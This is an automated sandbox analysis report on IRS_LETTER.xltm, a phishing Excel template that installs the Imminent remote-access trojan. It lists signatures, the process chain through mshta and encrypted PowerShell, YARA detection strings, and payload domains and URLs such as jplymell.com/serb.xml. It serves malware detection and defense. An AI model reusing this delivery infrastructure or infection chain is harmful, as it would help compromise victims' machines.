ID: 192261 Sample Name: IRS_LETTER.xltm Cookbook: defaultwindowsofficecookbook.jbs Time: 20:57:24 Date: 26/11/2019 Version: 28.0.0 Lapis Lazuli Table of Contents

Table of Contents 2 Analysis Report IRS_LETTER.xltm 5 Overview 5 General Information 5 Detection 6 Confidence 6 Classification 7 Analysis Advice 7 Mitre Att&ck Matrix 7 Signature Overview 8 AV Detection: 8 Software Vulnerabilities: 9 Networking: 9 E-Banking Fraud: 9 System Summary: 9 Data Obfuscation: 10 Persistence and Installation Behavior: 10 Boot Survival: 10 Hooking and other Techniques for Hiding and Protection: 10 Malware Analysis System Evasion: 10 Anti Debugging: 10 HIPS / PFW / Operating System Protection Evasion: 10 Language, Device and Operating System Detection: 10 Lowering of HIPS / PFW / Operating System Security Settings: 11 Stealing of Sensitive Information: 11 Remote Access Functionality: 11 Behavior Graph 11 Simulations 11 Behavior and APIs 11 Antivirus, Machine Learning and Genetic Malware Detection 12 Initial Sample 12 Dropped Files 12 Unpacked PE Files 12 Domains 12 URLs 12 Yara Overview 13 Initial Sample 13 PCAP (Network Traffic) 13 Dropped Files 13 Memory Dumps 13 Unpacked PEs 14 Sigma Overview 14 System Summary: 14 Joe Sandbox View / Context 14 IPs 14 Domains 15 ASN 15 JA3 Fingerprints 16 Dropped Files 16 Screenshots 16 Thumbnails 16 Startup 17 Created / dropped Files 18 Domains and IPs 25 Contacted Domains 25 URLs from Memory and Binaries 25 Contacted IPs 30 Public 30 Static File Info 31 Copyright Joe Security LLC 2019 Page 2 of 67 General 31 File Icon 31 Static OLE Info 31 General 31 OLE File "xl/vbaProject.bin" 31 Indicators 31 Streams with VBA 31 VBA File Name: Sheet1.cls, Stream Size: 977 31 General 31 VBA Code Keywords 32 VBA Code 32 VBA File Name: TNXiUBqrSCXLbjLDqiGJRqg.frm, Stream Size: 1176 32 General 32 VBA Code Keywords 32 VBA Code 32 VBA File Name: ThisWorkbook.cls, Stream Size: 1815 32 General 32 VBA Code Keywords 33 VBA Code 33 Streams 33 Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 568 33 General 33 Stream Path: PROJECTwm, File Type: data, Stream Size: 134 33 General 34 Stream Path: TNXiUBqrSCXLbjLDqiGJRqg/\x1CompObj, File Type: data, Stream Size: 97 34 General 34 Stream Path: TNXiUBqrSCXLbjLDqiGJRqg/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 457 34 General 34 Stream Path: TNXiUBqrSCXLbjLDqiGJRqg/f, File Type: data, Stream Size: 242 34 General 34 Stream Path: TNXiUBqrSCXLbjLDqiGJRqg/i01/\x1CompObj, File Type: data, Stream Size: 112 34 General 34 Stream Path: TNXiUBqrSCXLbjLDqiGJRqg/i01/f, File Type: data, Stream Size: 56 35 General 35 Stream Path: TNXiUBqrSCXLbjLDqiGJRqg/i01/o, File Type: empty, Stream Size: 0 35 General 35 Stream Path: TNXiUBqrSCXLbjLDqiGJRqg/o, File Type: empty, Stream Size: 0 35 General 35 Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3458 35 General 35 Stream Path: VBA/dir, File Type: 88K BCS executable, Stream Size: 881 35 General 35 Network Behavior 36 Network Port Distribution 36 TCP Packets 36 UDP Packets 38 DNS Queries 38 DNS Answers 38 HTTPS Packets 38 Code Manipulations 39 Statistics 39 Behavior 39 System Behavior 39 Analysis Process: EXCEL.EXE PID: 3896 Parent PID: 700 39 General 39 File Activities 40 File Created 40 File Deleted 40 File Written 40 Registry Activities 49 Key Created 49 Key Value Created 49 Analysis Process: rundll32.exe PID: 2752 Parent PID: 3896 50 General 50 File Activities 50 Analysis Process: mshta.exe PID: 5072 Parent PID: 2752 50 General 50 File Activities 51 Analysis Process: cmd.exe PID: 980 Parent PID: 5072 51 General 51 File Activities 52 Analysis Process: conhost.exe PID: 4384 Parent PID: 980 52 General 52 Analysis Process: powershell.exe PID: 4500 Parent PID: 980 52 General 52 File Activities 53 File Created 53 Copyright Joe Security LLC 2019 Page 3 of 67 File Deleted 54 File Written 54 File Read 57 Registry Activities 59 Analysis Process: Silvepurity.exe PID: 2816 Parent PID: 4500 59 General 59 File Activities 59 File Created 59 File Deleted 60 File Written 60 File Read 61 Analysis Process: schtasks.exe PID: 1728 Parent PID: 2816 62 General 62 File Activities 62 File Read 62 Analysis Process: conhost.exe PID: 5076 Parent PID: 1728 62 General 62 Analysis Process: Silvepurity.exe PID: 4264 Parent PID: 2816 62 General 62 File Activities 63 File Created 63 File Deleted 64 File Written 64 File Read 66 Registry Activities 67 Key Created 67 Key Value Created 67 Disassembly 67 Code Analysis 67

Copyright Joe Security LLC 2019 Page 4 of 67 Analysis Report IRS_LETTER.xltm

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli Analysis ID: 192261 Start date: 26.11.2019 Start time: 20:57:24 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 9m 51s Hypervisor based Inspection enabled: false Report type: light Sample file name: IRS_LETTER.xltm Cookbook file name: defaultwindowsofficecookbook.jbs Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113 Run name: Potential for more IOCs and behavior Number of analysed new started processes analysed: 17 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled Analysis stop reason: Timeout Detection: MAL Classification: mal100.troj.expl.evad.winXLTM@17/26@4/2 EGA Information: Successful, ratio: 20% HDC Information: Successful, ratio: 4% (good quality ratio 1.9%) Quality average: 31.4% Quality standard deviation: 36.3% HCA Information: Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .xltm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Copyright Joe Security LLC 2019 Page 5 of 67 Warnings: Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe, WmiPrvSE.exe, WmiApSrv.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.109.88.8, 13.107.3.128, 13.107.5.88, 52.109.88.35, 52.114.128.8 Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, afdo-tas- offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, s-0001.s- msedge.net, mobile.pipe.aria.microsoft.com, e- 0009.e-msedge.net, prod.nexusrules.live.com.akadns.net, prd.col.aria.mobile.skypedata.akadns.net, pipe.skype.com, config.officeapps.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, config.edge.skype.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, pipe.cloudapp.aria.akadns.net Execution Graph export aborted for target EXCEL.EXE, PID 3896 because there are no executed function Execution Graph export aborted for target Silvepurity.exe, PID 2816 because it is empty Execution Graph export aborted for target mshta.exe, PID 5072 because there are no executed function Execution Graph export aborted for target powershell.exe, PID 4500 because it is empty Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy Score Range Reporting Whitelisted Threat Detection

Imminent Threshold 100 0 - 100 false

Confidence

Strategy Score Range Further Analysis Required? Confidence

Threshold 5 0 - 5 false

Copyright Joe Security LLC 2019 Page 6 of 67 Classification

Ransomware

Miner Spreading

mmaallliiiccciiioouusss

malicious

Evader Phishing

sssuusssppiiiccciiioouusss

suspicious

cccllleeaann

clean

Exploiter Banker

Spyware Trojan / Bot

Adware

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Copyright Joe Security LLC 2019 Page 7 of 67 Privilege Credential Lateral Command Initial Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Valid Windows Management Scheduled Access Token Software Packing 3 Credential Security Software Remote File Email Data Uncommonly Accounts Instrumentation 1 2 1 Task 1 Manipulation 1 Dumping Discovery 2 3 1 Copy 1 Collection 1 Encrypted 1 1 Used Port Replication Rundll32 1 Port Process Disabling Security Network File and Directory Remote Data from Exfiltration Over Commonly Through Monitors Injection 1 1 2 Tools 1 Sniffing Discovery 2 Services Removable Other Network Used Port Removable Media Medium Media External PowerShell 3 Accessibility Scheduled Deobfuscate/Decode Input Capture System Windows Data from Automated Remote File Remote Features Task 1 Files or Information 1 Information Remote Network Exfiltration Copy 1 Services Discovery 1 6 Management Shared Drive Drive-by Scripting 1 1 System DLL Search Rundll32 1 Credentials in Process Logon Input Data Encrypted Standard Compromise Firmware Order Hijacking Files Discovery 2 Scripts Capture Cryptographic Protocol 1 Exploit Public- Exploitation for Client Shortcut File System Scripting 1 1 Account Application Shared Data Staged Scheduled Remote Access Facing Execution 1 Modification Permissions Manipulation Window Webroot Transfer Tools 1 Application Weakness Discovery 1 Spearphishing Command-Line Modify New Service File Deletion 1 Brute Force Remote System Third-party Screen Data Transfer Standard Non- Link Interface 1 Existing Discovery 1 Software Capture Size Limits Application Service Layer Protocol 2 Spearphishing Scheduled Task 1 Path Scheduled Task Obfuscated Files or Two-Factor System Network Pass the Email Exfiltration Over Standard Attachment Interception Information 2 Authentication Configuration Hash Collection Command and Application Interception Discovery 1 Control Channel Layer Protocol 2 Spearphishing Third-party Software Logon Process Injection Masquerading 1 1 Bash History Network Service Remote Clipboard Exfiltration Over Standard via Service Scripts Scanning Desktop Data Alternative Application Protocol Protocol Layer Protocol Supply Chain Rundll32 DLL Search Service Registry Virtualization/Sandbox Input Prompt System Network Windows Automated Exfiltration Over Multilayer Compromise Order Permissions Evasion 2 Connections Admin Collection Physical Encryption Hijacking Weakness Discovery Shares Medium Trusted PowerShell Change Exploitation for Access Token Keychain Process Discovery Taint Shared Audio Transfer Data to Connection Relationship Default File Privilege Manipulation 1 Content Capture Cloud Account Proxy Association Escalation Hardware Execution through API File System Valid Accounts Process Private Keys Security Software Replication Video Communication Additions Permissions Injection 1 1 2 Discovery Through Capture Through Weakness Removable Removable Media Media Regsvr32 New Service Bypass User DLL Side-Loading 1 Securityd Permission Groups Pass the Man in the Custom Account Control Memory Discovery Ticket Browser Command and Control Protocol

Signature Overview

• AV Detection • Software Vulnerabilities • Networking • E-Banking Fraud • System Summary • Data Obfuscation • Persistence and Installation Behavior • Boot Survival • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection • Lowering of HIPS / PFW / Operating System Security Settings • Stealing of Sensitive Information • Remote Access Functionality

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Imminent

Machine Learning detection for dropped file

Copyright Joe Security LLC 2019 Page 8 of 67 Antivirus or Machine Learning detection for unpacked file

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Networking:

May check the online IP address of the machine

Detected TCP or UDP traffic on non-standard ports

Domain name seen in connection with other malware

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to download additional files from the internet

Found strings which match to known social media urls

Performs DNS lookups

Urls found in memory or binary data

Uses HTTPS

E-Banking Fraud:

Yara detected Imminent

System Summary:

Malicious sample detected (through community Yara rule)

Document contains an embedded VBA macro with suspicious strings

Powershell drops PE file

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Yara signature match

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Classification label

Contains functionality to adjust token privileges (e.g. debug / backup)

Creates files inside the user directory

Creates mutexes

Creates temporary files

Parts of this applications are using the .NET runtime (Probably coded in C#)

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Reads the hosts file

Runs a DLL by calling functions

SQL strings found in memory and binary data

Sample is known by Antivirus

Spawns processes

Uses an in-process (OLE) Automation server

Writes ini files

Reads internet explorer settings

Executable creates window controls seldom found in malware

Found graphical window changes (likely an installer)

Copyright Joe Security LLC 2019 Page 9 of 67 Uses Microsoft Silverlight

Checks if Microsoft Office is installed

Uses new MSVCR Dlls

Binary contains paths to debug symbols

Data Obfuscation:

PowerShell case anomaly found

Uses code obfuscation techniques (call, push, ret)

Binary may include packed or encrypted code

Persistence and Installation Behavior:

Drops PE files

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Disables application error messsages (SetErrorMode)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Yara detected Cassandra Crypter

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to query system information

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Queries a list of all running processes

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Enables debug privileges

Creates guard pages, often used to prevent reverse engineering and debugging

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Injects a PE file into a foreign processes

Creates a process in suspended mode (likely to inject code)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May try to detect the Windows Explorer process (often used for injection)

Language, Device and Operating System Detection:

Copyright Joe Security LLC 2019 Page 10 of 67 Queries the volume information (name, serial number etc) of a device

Queries the cryptographic machine GUID

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Stealing of Sensitive Information:

Yara detected Imminent

Remote Access Functionality:

Detected Imminent RAT

Yara detected Imminent

Contains functionality to start a terminal service

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Behavior Graph

Behavior Graph Hide Legend

ID: 192261

Sample: IRS_LETTER.xltm

Startdate: 26/11/2019 Architecture: WINDOWS Legend: Score: 100 Process Malicious sample detected Multi AV Scanner detection Multi AV Scanner detection (through community Yara 14 other signatures started for domain / URL for submitted file rule) Signature EXCEL.EXE

76 55 Created File

dropped dropped dropped

C:\Users\user\Desktop\~$IRS_LETTER.xltm, data C:\Users\...\6A10AB79.tmp:Zone.Identifier, ASCII C:\Users\user\AppData\Local\...\6A10AB79.tmp, Microsoft DNS/IP Info

started

Document exploit detected (process start blacklist Is Dropped hit)

rundll32.exe Is Windows Process

1

started Number of created Registry Values

mshta.exe Number of created Files 14

linkadrum.nl Visual Basic

185.223.28.211, 443, 49722, 49723 jplymell.com unknown Germany Delphi started

PowerShell case anomaly found Java

cmd.exe .Net C# or VB.NET 1

Encrypted powershell PowerShell case anomaly started started cmdline option found found C, C++ or other language

powershell.exe conhost.exe Is malicious

15 20 Internet jplymell.com dropped

C:\Users\user\AppData\Local\Silvepurity.exe, PE32 started

Powershell drops PE file

Silvepurity.exe

6

dropped dropped

C:\Users\user\AppData\...\tjInWEsrJITP.exe, PE32 C:\Users\user\AppData\Local\...\tmpB5CB.tmp, XML

started started

Queries sensitive video device information (via Machine Learning detection Injects a PE file into WMI, Win32_VideoController, for dropped file a foreign processes often done to detect virtual machines)

Silvepurity.exe schtasks.exe

15 13 1

iptrackeronline.com

linkadrum.nl 45.55.57.244, 443, 49725 www.iptrackeronline.com unknown United States

started

Hides that the sample Deletes itself after has been downloaded installation from the Internet (zone.identifier)

conhost.exe

Simulations

Behavior and APIs

Copyright Joe Security LLC 2019 Page 11 of 67 Time Type Description 20:58:50 API Interceptor 30x Sleep call for process: powershell.exe modified 20:58:54 API Interceptor 2802x Sleep call for process: Silvepurity.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link IRS_LETTER.xltm 11% Virustotal Browse

Dropped Files

Source Detection Scanner Label Link C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A10AB79.tmp 100% Joe Sandbox ML C:\Users\user\AppData\Roaming\tjInWEsrJITP.exe 100% Joe Sandbox ML C:\Users\user\AppData\Local\Silvepurity.exe 100% Joe Sandbox ML

Unpacked PE Files

Source Detection Scanner Label Link Download 12.2.Silvepurity.exe.400000.0.unpack 100% Avira TR/Dropper.Gen Download File

Domains

Source Detection Scanner Label Link jplymell.com 8% Virustotal Browse linkadrum.nl 8% Virustotal Browse

URLs

Source Detection Scanner Label Link https://cdn.entity. 0% URL Reputation safe https://rpsticket.partnerservices.getmicrosoftkey.com 0% URL Reputation safe https://jplymell.com 1% Virustotal Browse https://jplymell.com 0% Avira URL Cloud safe https://api.aadrm.com/ 0% Virustotal Browse https://api.aadrm.com/ 0% URL Reputation safe https://jplymell.com/rootweb/applepeg.jpg 0% Avira URL Cloud safe www.zhongyicts.com.cn 0% Virustotal Browse www.zhongyicts.com.cn 0% URL Reputation safe https://res.getmicrosoftkey.com/api/redemptionevents 0% Virustotal Browse https://res.getmicrosoftkey.com/api/redemptionevents 0% URL Reputation safe https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer 0% URL Reputation safe https://officeci.azurewebsites.net/api/ 0% Virustotal Browse https://officeci.azurewebsites.net/api/ 0% Avira URL Cloud safe https://jplymell.com/serb.xml 10% Virustotal Browse https://jplymell.com/serb.xml 0% Avira URL Cloud safe https://store.office.cn/addinstemplate 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% Virustotal Browse pesterbdd.com/images/Pester.png 0% URL Reputation safe cps.letsencrypt.org0 0% URL Reputation safe https://wus2-000.pagecontentsync. 0% URL Reputation safe https://contoso.com/Icon 0% URL Reputation safe https://www.odwebp.svc.ms 0% Virustotal Browse https://www.odwebp.svc.ms 0% URL Reputation safe https://jplymell.com/serb.xml))H 0% Avira URL Cloud safe https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsFlag 0% Avira URL Cloud safe ad.double(. 0% Avira URL Cloud safe https://substrate.office.comrlg 0% Avira URL Cloud safe www.carterandcone.coml 0% URL Reputation safe https://graph.windows.netx 0% Avira URL Cloud safe https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci. 0% Avira URL Cloud safe

Copyright Joe Security LLC 2019 Page 12 of 67 Source Detection Scanner Label Link https://settings.outlook.com( 0% Avira URL Cloud safe https://incidents.diagnostics.office.comODSIncidentsSdfUrlhttps://incidents.diagnosticssdf.office.co 0% Avira URL Cloud safe https://devnull.onenote.comMBI_SSL_SHORT 0% URL Reputation safe https://outlook.office.com( 0% Avira URL Cloud safe https://powerlift.acompli.netx$( 0% Avira URL Cloud safe www.founder.com.cn/cn/bThe 0% Virustotal Browse www.founder.com.cn/cn/bThe 0% URL Reputation safe https://prod-global-autodetect.acompli.net/autodetectnAutoDetectTestAPIUrlhttps://dev0- 0% Avira URL Cloud safe api.acompli.n https://www.odwebp.svc.msol 0% Avira URL Cloud safe schemas.micro 0% URL Reputation safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source Rule Description Author Strings C:\Users\user\AppData\Local\Microsoft\Windows\INet PowerShell_Case_Anomal Detects Florian Roth 0x192:$s1: pOweRsHeLL Cache\IE\KSU5XQMC\serb[1].xml y obfuscated PowerShell hacktools

Memory Dumps

Source Rule Description Author Strings 00000003.00000003.1809873177.0000000002D PowerShell_Case_Anomal Detects Florian Roth 0x9828:$s1: pOweRsHeLL 72000.00000004.00000001.sdmp y obfuscated PowerShell hacktools 0000000C.00000002.2270037428.0000000002C JoeSecurity_Imminent Yara detected Joe Security 40000.00000004.00000001.sdmp Imminent 00000006.00000002.1841384782.00000000090 PowerShell_Case_Anomal Detects Florian Roth 0x2e9c:$s1: pOweRsHeLL E5000.00000004.00000001.sdmp y obfuscated 0x429e:$s1: pOweRsHeLL PowerShell 0x5b52:$s1: pOweRsHeLL hacktools 0x6a8c:$s1: pOweRsHeLL 0x7408:$s1: pOweRsHeLL 00000003.00000003.1810136216.0000000002D PowerShell_Case_Anomal Detects Florian Roth 0x1528d:$s1: pOweRsHeLL 35000.00000004.00000001.sdmp y obfuscated PowerShell hacktools 00000003.00000003.1809303287.00000000059 PowerShell_Case_Anomal Detects Florian Roth 0xeb6:$s1: pOweRsHeLL B1000.00000004.00000001.sdmp y obfuscated 0x29fe:$s1: pOweRsHeLL PowerShell 0x3f66:$s1: pOweRsHeLL hacktools 0x67fa:$s1: pOweRsHeLL 0x74a6:$s1: pOweRsHeLL 0x836a:$s1: pOweRsHeLL 00000003.00000002.1813680366.0000000002D PowerShell_Case_Anomal Detects Florian Roth 0x1528d:$s1: pOweRsHeLL 35000.00000004.00000001.sdmp y obfuscated PowerShell hacktools 00000003.00000002.1813301119.0000000002B PowerShell_Case_Anomal Detects Florian Roth 0x718e:$s1: pOweRsHeLL C0000.00000004.00000020.sdmp y obfuscated PowerShell hacktools 00000003.00000003.1809551068.0000000002D PowerShell_Case_Anomal Detects Florian Roth 0xe828:$s1: pOweRsHeLL 6D000.00000004.00000001.sdmp y obfuscated PowerShell hacktools 00000006.00000002.1828690340.0000000000E PowerShell_Case_Anomal Detects Florian Roth 0x1570:$s1: pOweRsHeLL 20000.00000004.00000040.sdmp y obfuscated PowerShell hacktools Copyright Joe Security LLC 2019 Page 13 of 67 Source Rule Description Author Strings 00000003.00000002.1814187337.0000000002D PowerShell_Case_Anomal Detects Florian Roth 0x8828:$s1: pOweRsHeLL 73000.00000004.00000001.sdmp y obfuscated PowerShell hacktools 00000003.00000003.1810261279.0000000002D PowerShell_Case_Anomal Detects Florian Roth 0x1528d:$s1: pOweRsHeLL 35000.00000004.00000001.sdmp y obfuscated PowerShell hacktools 00000003.00000002.1818513629.0000000005D PowerShell_Case_Anomal Detects Florian Roth 0x10502:$s1: pOweRsHeLL 70000.00000004.00000001.sdmp y obfuscated 0x10f6e:$s1: pOweRsHeLL PowerShell 0x1199a:$s1: pOweRsHeLL hacktools 00000003.00000003.1809810062.0000000002D PowerShell_Case_Anomal Detects Florian Roth 0x1528d:$s1: pOweRsHeLL 35000.00000004.00000001.sdmp y obfuscated PowerShell hacktools Process Memory Space: Silvepurity.exe PID: 4264 JoeSecurity_Imminent Yara detected Joe Security Imminent Process Memory Space: Silvepurity.exe PID: 2816 JoeSecurity_AntiVM_3 Yara detected Joe Security AntiVM_3 Process Memory Space: Silvepurity.exe PID: 2816 JoeSecurity_CassandraCr Yara detected Joe Security ypter Cassandra Crypter

Unpacked PEs

Source Rule Description Author Strings 12.2.Silvepurity.exe.400000.0.unpack Imminent_1 Imminent Payload kevoreilly 0x4f395:$string1: Imminent-Monitor 0x4f2c9:$string2: [email protected] 0x4f799:$string3: SevenZipHelper 0x4f8b0:$string4: get_EntryPoint 0x4fbd7:$string5: WrapNonExceptionThrows

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Possible Applocker Bypass

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 45.55.57.244 38PO.exe Get hash malicious Browse 57DHL AWB #9377.exe Get hash malicious Browse 21file1253634_Protected.exe Get hash malicious Browse 15OrderList_Inquiry.exe Get hash malicious Browse 70payment $37,140.exe Get hash malicious Browse Software.exe Get hash malicious Browse 15Sept PO.doc Get hash malicious Browse 18Products List.doc Get hash malicious Browse 2618212_01_CARTE.doc Get hash malicious Browse 44swift copy.exe Get hash malicious Browse Registraduria Nacional del Estado Civil -Proceso inicado.doc Get hash malicious Browse Registraduria Nacional del Estado Civil -Proceso inicado.doc Get hash malicious Browse 75TTcopy_payment10000$.exe Get hash malicious Browse 1d8.doc Get hash malicious Browse 63purchase order.exe Get hash malicious Browse 29Purchase Details Quotation.exe Get hash malicious Browse

Copyright Joe Security LLC 2019 Page 14 of 67 Match Associated Sample Name / URL SHA 256 Detection Link Context 69RENEWAL OF PROFESSIONAL INDEMNITY INSU Get hash malicious Browse RANCE POLICY-KELVIC.pd.exe 57TP DSA database.xls.exe Get hash malicious Browse Heating_Invoice.doc Get hash malicious Browse 11VFBGTYR.js Get hash malicious Browse 185.223.28.211 IRS_LETTER.xltm Get hash malicious Browse PO52P91df9bc210ac7cd131524cc_Invoice.xlsb Get hash malicious Browse PO52P91df9bc210ac7cd131524cc_Invoice.xlsb Get hash malicious Browse PO52P91df9bc210ac7cd131524cc_Invoice.xlsb Get hash malicious Browse

Domains

Match Associated Sample Name / URL SHA 256 Detection Link Context iptrackeronline.com 1d8.doc Get hash malicious Browse 45.55.57.244 63purchase order.exe Get hash malicious Browse 45.55.57.244 Migracion colombia detalles de su Proceso pendiente.doc Get hash malicious Browse 45.55.57.244 29Purchase Details Quotation.exe Get hash malicious Browse 45.55.57.244 jplymell.com PO52P91df9bc210ac7cd131524cc_Invoice.xlsb Get hash malicious Browse 185.223.28.211 PO52P91df9bc210ac7cd131524cc_Invoice.xlsb Get hash malicious Browse 185.223.28.211 PO52P91df9bc210ac7cd131524cc_Invoice.xlsb Get hash malicious Browse 185.223.28.211 2019-08-Past Due Invoice_PO83928345.xls Get hash malicious Browse 195.201.76.133 2019-08-Past Due Invoice_PO83928345.xls Get hash malicious Browse 195.201.76.133 2019-08-Past Due Invoice_PO83928345.xls Get hash malicious Browse 195.201.76.133 92413-014sQhEafVAI8CE5wRHIdG4N.xlsb Get hash malicious Browse 189.38.24.21 92413-014sQhEafVAI8CE5wRHIdG4N.xlsb Get hash malicious Browse 189.38.24.21 92413-014sQhEafVAI8CE5wRHIdG4N.xlsb Get hash malicious Browse 189.38.24.21

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context unknown IRS_LETTER.xltm Get hash malicious Browse 185.223.28.211 5.45.79.15/input/?mark=20191025- Get hash malicious Browse 185.211.246.22 www.centrocor.em.art.br/v2zga&tpl=XXXXXXXXXXXXXXXXX XXXXX arorapc.homelinux.com Get hash malicious Browse 185.29.134.87 BEOs.pdf Get hash malicious Browse 3.3.0.2 CRE_7467205210957048.vbs Get hash malicious Browse 216.108.22 7.103 www.santecza.com Get hash malicious Browse 46.105.201.240 70-2211-3591614888.doc Get hash malicious Browse 39.106.149.23 CRE_7467205210957048.vbs Get hash malicious Browse 216.108.22 7.103 copy-Inv. doc 20191126_91654.xls Get hash malicious Browse 124.156.35.183 Get hash malicious Browse 178.159.36.237 https://app.nihaocloud.com/d/daa8bf555d32471ea8cb/files/? p=/Research Review.pdf 0479306-200213.xls Get hash malicious Browse 162.255.119.24 Project3 (1).doc Get hash malicious Browse 41.233.206.59 copy-Inv. doc 20191126_91654.xls Get hash malicious Browse 124.156.35.183 0479306-200213.xls Get hash malicious Browse 162.255.119.24 0479306-200213.xls Get hash malicious Browse 192.64.119.71 #U266bVAudio4687272-37541.wav.htm Get hash malicious Browse 192.99.245.102 copy-Inv. doc 20191126_91654.xls Get hash malicious Browse 124.156.35.183 yaml-bench Get hash malicious Browse 2.56.212.84 info.rkeindustries.info/r.php?93758590 Get hash malicious Browse 194.76.225.14 executable.2772.exe Get hash malicious Browse 23.253.46.64 unknown IRS_LETTER.xltm Get hash malicious Browse 185.223.28.211 5.45.79.15/input/?mark=20191025- Get hash malicious Browse 185.211.246.22 www.centrocor.em.art.br/v2zga&tpl=XXXXXXXXXXXXXXXXX XXXXX arorapc.homelinux.com Get hash malicious Browse 185.29.134.87 BEOs.pdf Get hash malicious Browse 3.3.0.2 CRE_7467205210957048.vbs Get hash malicious Browse 216.108.22 7.103 www.santecza.com Get hash malicious Browse 46.105.201.240 70-2211-3591614888.doc Get hash malicious Browse 39.106.149.23

Copyright Joe Security LLC 2019 Page 15 of 67 Match Associated Sample Name / URL SHA 256 Detection Link Context CRE_7467205210957048.vbs Get hash malicious Browse 216.108.22 7.103 copy-Inv. doc 20191126_91654.xls Get hash malicious Browse 124.156.35.183 Get hash malicious Browse 178.159.36.237 https://app.nihaocloud.com/d/daa8bf555d32471ea8cb/files/? p=/Research Review.pdf 0479306-200213.xls Get hash malicious Browse 162.255.119.24 Project3 (1).doc Get hash malicious Browse 41.233.206.59 copy-Inv. doc 20191126_91654.xls Get hash malicious Browse 124.156.35.183 0479306-200213.xls Get hash malicious Browse 162.255.119.24 0479306-200213.xls Get hash malicious Browse 192.64.119.71 #U266bVAudio4687272-37541.wav.htm Get hash malicious Browse 192.99.245.102 copy-Inv. doc 20191126_91654.xls Get hash malicious Browse 124.156.35.183 yaml-bench Get hash malicious Browse 2.56.212.84 info.rkeindustries.info/r.php?93758590 Get hash malicious Browse 194.76.225.14 executable.2772.exe Get hash malicious Browse 23.253.46.64

JA3 Fingerprints

